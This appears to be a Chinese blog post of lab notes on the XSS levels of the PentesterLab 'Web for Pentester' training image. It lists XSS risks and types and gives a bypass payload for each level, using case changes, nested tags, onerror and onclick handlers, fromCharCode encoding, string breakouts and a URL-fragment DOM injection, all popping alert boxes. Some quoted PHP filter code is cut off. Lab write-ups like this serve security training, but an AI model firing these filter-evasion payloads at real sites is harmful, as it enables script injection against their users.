Web For Pentester靶场

镜像下载大小172mb
https://pentesterlab.com/exercises/web_for_pentester/attachments

第一关xss
xss危害
网络钓鱼
盗取cookies信息
劫持用户浏览器
弹出广告页面,刷流量
网页挂马
提升权限,进一步渗透
键盘监听(https://blog.csdn.net/weixin_44720762/article/details/89766484)
类型
反射性xss(非持久型)
存储型xss (持久型)
dom xss
0x01

没有任何过滤直接弹

0x02

/","", $name); $name = preg_replace("/<\/script>/","", $name); echo $name; ?>

仔细看了一下大小写绕过
preg_replace 函数来过滤标签 由于没有考虑大小 所以大小写转换绕过

0x03

/i","", $name); $name = preg_replace("/<\/script>/i","", $name); echo $name; ?>

<scscript>
0x04

Hello
这里只好使用其他标签绕过
<img src=x onerror=alert('XSS')>
0x05

Hello
编码绕过

String.fromCharCode(97, 108, 101, 114, 116, 40, 39, 88, 83, 83, 39, 41)
0x06

";alert('XSS');"
";alert('XSS');//
0x07

';alert('XSS');'
';alert('XSS');//

0x08

Your name: 利用下面的传参 get的形式去 /">// /" onclick=alert('XSS')//

0x09

http://192.168.1.6/xss/example9.php#<script>alert('XSS')</script>
这个可能利用不成功换浏览器

posted @ 2021-07-22 09:46  kr0x02  阅读(66)  评论(0编辑  收藏  举报